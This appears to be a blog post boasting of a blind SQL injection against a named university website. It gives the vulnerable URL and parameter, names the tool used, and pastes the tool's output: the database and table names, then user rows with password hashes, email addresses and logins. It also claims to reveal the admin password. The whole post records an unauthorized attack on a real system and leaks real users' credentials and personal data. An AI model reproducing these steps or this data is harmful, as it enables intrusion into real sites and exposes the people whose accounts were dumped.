admin password = unesah
Problem: Where is the admin directory?
Website:http://www.unesa.ac.id
Bug: SQL injection
Tool: blindext.py
Dumps:
[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 17:45:33
[+] Number of Rows: 1
[0]: webunesa
[-] 17:46:20
[-] Total URL Requests 80
[-] Done
[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[17:46:30] StartTime
[+] Fuzzing Tables...
[Table]:user
[Column]:passwd
[Column]:id
[Column]:email
[Column]:login
[17:47:26] EndTime
[-] Total URL Requests 227
[-] Done
[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "webunesa" Table "user"
[+] Column(s) ['passwd', 'id', 'email', 'login']
[+] 17:47:56
[+] Number of Rows: 15
[0]: a456cd1f2bb4665b380ad93060b977b1:111:soboparan@yahoo.com:ari
[1]: 4ea43e57d6f0054756af707ba44e85cc:111::pasca
[2]: 25eb39c0affd2939b4291d4141c4cb5b:111:alim_sumarno@yahoo.com:alim
I terminated here because it took a long time :). The admin is in the first row.
0 comments:
Post a Comment